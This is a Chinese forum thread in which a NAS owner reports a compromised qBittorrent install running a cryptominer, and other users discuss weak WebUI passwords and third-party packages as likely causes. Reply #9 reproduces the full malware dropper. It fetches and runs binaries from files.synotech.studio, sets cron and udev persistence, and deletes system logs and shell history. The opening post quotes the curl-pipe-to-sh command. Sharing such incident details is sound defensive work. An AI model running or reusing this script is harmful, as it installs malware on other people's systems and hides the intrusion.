请不要把任何和邀请码有关的内容发到 NAS 节点。
邀请码相关的内容请使用 /go/in 节点。
如果没有发送到 /go/in,那么会被移动到 /go/pointless 同时账号会被降权。如果持续触发这样的移动,会导致账号被禁用。
邀请码相关的内容请使用 /go/in 节点。
如果没有发送到 /go/in,那么会被移动到 /go/pointless 同时账号会被降权。如果持续触发这样的移动,会导致账号被禁用。
这是一个创建于 268 天前的主题,其中的信息可能已经有所发展或是发生改变。
- 在昨天下班回家后,听见 nas 怪吵,看了下探针 CPU50%,检查进程,qbittorrent 进程极为活跃,但是没有正在下载的内容。平时一直用 rss 自动挂 sukebei ,确认过确实没有活跃任务,这就活见鬼了。
- ssh 中 top 了一下,b3qmud4h 这个进程跑的飞起,怀疑有问题,互联网上搜索一圈,b3qmud4h 为自动生成的字段。
- kill -9 该进程后,cpu 恢复正常,qb 服务也没出现问题
- 重启 qbittorrent ,再次出现高 cpu 占用进程,同样为随机字符的任务。
- 检查 qbittorrent 日志,发现 “运行外部程序。Torrent:“*********”。命令:`sh -c "(curl -skL https://files.synotech.studio || wget --no-check-certificate -qO - https://files.synotech.studio) | sh"`”
- 通过搜索,得知设置→下载→运行外部程序 选项如果打勾的话,是可以通过种子直接运行脚本的
- 大家务必检查一下这个设置是否开启,我的印象里是没有认为开启过,可能和包或者是 docker 镜像有关
- ssh 中 top 了一下,b3qmud4h 这个进程跑的飞起,怀疑有问题,互联网上搜索一圈,b3qmud4h 为自动生成的字段。
- kill -9 该进程后,cpu 恢复正常,qb 服务也没出现问题
- 重启 qbittorrent ,再次出现高 cpu 占用进程,同样为随机字符的任务。
- 检查 qbittorrent 日志,发现 “运行外部程序。Torrent:“*********”。命令:`sh -c "(curl -skL https://files.synotech.studio || wget --no-check-certificate -qO - https://files.synotech.studio) | sh"`”
- 通过搜索,得知设置→下载→运行外部程序 选项如果打勾的话,是可以通过种子直接运行脚本的
- 大家务必检查一下这个设置是否开启,我的印象里是没有认为开启过,可能和包或者是 docker 镜像有关
43 条回复
 | 1 TeslaLyon 268 天前 |
 | 2 villivateur 268 天前 话说 qBittorrent 为什么要写这么危险的功能呢?如果把挖矿脚本换成木马,岂不是一下子倒一大片 |
 | 3 k9982874 268 天前 via Android 官方源的包不会有问题,你的 qb 安装自不明脚本? |
| 5 villivateur 268 天前  3 而且我看了,这个功能的目的是相当于一个种子下载之后的 hook ,“外部程序”指的本机本来就有的程序,所以大概率还是你的 qb 本身已经被入侵了。 |
7 ysc3839 268 天前 via Android 那个脚本要用户自己去设置里填写的吧?怎么可能自动从种子里获取?感觉是别的地方被入侵了,比如说开启了 WebUI 没设置密码暴露到公网上了。 |
 | 8 iislong 268 天前 via Android 我的一切正常 |
 | 9 Sanarara OP #!/bin/sh ARCH=$(uname -m) FILE=$(head /dev/urandom | tr -dc 'A-Za-z0-9' | head -c 8) if [ ! "$(grep -c ":5B25" /proc/net/tcp)" -gt 0 ]; then EXEC=$(for i in $(mount | grep -awv noexec | grep -aw "rw" | awk '{print $3}'); do find $i -maxdepth 0 -type d -executable 2>/dev/null; done) (ps -eo pid,%cpu --sort=-%cpu | awk '$2 > 80 {print $1}' | xargs -I % kill -9 %) >/dev/null 2>&1 if [ "$ARCH" = "x86_64" ]; then for i in /tmp $PWD $HOME $EXEC; do (curl -sk https://files.synotech.studio/1 -o "$i"/"$FILE" || wget --no-check-certificate -qO "$i"/"$FILE" https://files.synotech.studio/1) >/dev/null 2>&1 (cd "$i" ; chmod +x "$FILE" ; ./"$FILE") >/dev/null 2>&1 rm -rf "$i"/"$FILE" >/dev/null 2>&1 sleep 15 if [ "$(grep -c ":5B25" /proc/net/tcp)" -gt 0 ]; then break fi done elif [ "$ARCH" = "aarch64" ]; then for i in /tmp $PWD $HOME $EXEC; do (curl -sk https://files.synotech.studio/2 -o "$i"/"$FILE" || wget --no-check-certificate -qO "$i"/"$FILE" https://files.synotech.studio/2) >/dev/null 2>&1 (cd "$i" ; chmod +x "$FILE" >/dev/null 2>&1 ; ./"$FILE") >/dev/null 2>&1 rm -rf "$i"/"$FILE" >/dev/null 2>&1 sleep 15 if [ "$(grep -c ":5B25" /proc/net/tcp)" -gt 0 ]; then break fi done else exit 1 fi fi (if sudo -n true; then find /etc/cron.d -type f -exec rm -rf {} \; ; elif [ "$(id -u)" -eq 0 ]; then find /etc/cron.d -type f -exec rm -rf {} \; ; fi) >/dev/null 2>&1 (if sudo -n true; then echo 0 0 \* \* \* root sh -c "\"(curl -sk https://files.synotech.studio || wget --no-check-certificate -qO - https://files.synotech.studio) | sh"\" | sudo tee /etc/cron.d/mdadm; elif [ "$(id -u)" -eq 0 ]; then echo 0 0 \* \* \* root sh -c "\"(curl -sk https://files.synotech.studio || wget --no-check-certificate -qO - https://files.synotech.studio) | sh"\" | tee /etc/cron.d/mdadm; fi) >/dev/null 2>&1 UDEV='SUBSYSTEM=="net", KERNEL!="lo", RUN+="echo 0 0 \* \* \* root sh -c "\"(curl -sk https://files.synotech.studio || wget --no-check-certificate -qO - https://files.synotech.studio) | sh"\" | (sudo tee /etc/cron.d/mdadm || tee /etc/cron.d/mdadm)"' (if sudo -n true; then echo $UDEV | sudo tee /etc/udev/rules.d/mdadm; elif [ "$(id -u)" -eq 0 ]; then echo $UDEV | tee /etc/udev/rules.d/mdadm; fi) >/dev/null 2>&1 (if sudo -n true; then for logs in $(sudo find /var/log -type f); do sudo rm $logs; done; elif [ "$(id -u)" -eq 0 ]; then for logs in $(find /var/log -type f); do rm $logs; done; fi) >/dev/null 2>&1 (rm $HOME/.bash_history) >/dev/null 2>&1 (history -c) >/dev/null 2>&1 |
| 11 Sanarara OP @villivateur 原来如此,但是更恐怖了啊 |
 | 12 NoOne1 268 天前 百分百弱口令,毕竟我也扫到过 N 多 8082 默认 admin:adminadmin |
 | 13 kklove77 268 天前 遇到过同样的问题,进程名叫 SyGlcPtf ,原因是 qb 用的弱密码,长教训了 |
 | 14 65r4Zgm364TDg652 268 天前 我也正在用同版 qb ,请问到底应该是哪里设置可以规避?看了下,默认情况下:设置→下载→运行外部程序处的俩都没有勾选 |
 | 15 StarsunYzL 268 天前 qBittorrent 有官方 docker ,可以装在群晖上,为啥要用第三方的呢 |
| 16 0IuL7w7X5K2HJxZf 268 天前 @cat #6 哈哈哈,说的太对了! |
 | 17 NG6 268 天前 能用官方的尽量用官方的,不要安装来路不明的软件 |
| 18 Sanarara OP 在/volume1/@appstore/qBitttorrent 目录下发现 o2PHN18N 文件 |
 | 19 Leon777 268 天前 我不是矿神 |
 | 20 wwd179 268 天前 你的 qb 被爆破了吧? 可以用 fail2ban 啥的,搞基于日志的防爆破。 |
 | 21 konakona 268 天前 好多年没用过种子下载了…… |
 | 23 vpsvps 268 天前 1 谢谢提醒! 已卸载全部群晖上的所有矿神源提供的软件! |
 | 24 yangzzzzzz 268 天前 qb 外网端口我都没开 |
| 25 vpsvps 268 天前 居然设置后门! 真服了 点开已安装套件页面 进入软件界面 看到发布者是矿神 XXX 的 我都把卸载了 |
 | 26 kaedeair 268 天前 @villivateur #2 什么事情都有两面性,本质上是一个 action 的 hook 。最简单的用法就是缓存盘下完转移到储存盘和转移给 tr 保种 |
 | 27 A3m0n 268 天前 @villivateur 我是用这个功能来发送下载完成的通知的。 |
 | 28 BrontByte 268 天前 盲猜用了反代 还开了 qb 的"对本地主机上的客户端跳过身份验证"选项 |
 | 29 huangsijun17 268 天前 @villivateur #5 bash 是机器自带的吧,我运行 bash 下一个 sh 下来不就完了?而且 bash 一句话 getshell 多简单呢? |
 | 30 wsbqdyhm 268 天前 有没有改默认密码?没有改那 100%是爆破了,其次不要公网映射或者映射为一些常见端口,最后你提到设置那个开关默认是没有打开的 |
 | 31 salmon5 268 天前 不懂问下:qBittorrent 不是一个下载客户端吗?怎么还有弱口令? |
 | 35 Rorysky 268 天前 不知道 这个 wget --no-check-certificate https://files.synotech.studio/1 下载的文件是干什么的 |
 | 37 CEBBCAT 268 天前 省流:乌龙 |
 | 38 SakuraYuki 268 天前 还是用 tailscale 或者 surge 之类的 vpn 把 nas 包起来安全点 |
 | 39 Greendays 268 天前 qbit 改密码的流程好迷啊 |
 | 40 jqtmviyu 268 天前 加域名白名单或者改端口, 弱密码+暴露默认端口, 早晚被爆破. |
 | 43 xycost233 267 天前 问一问有没有好用的 homelab 探针  |
Select Language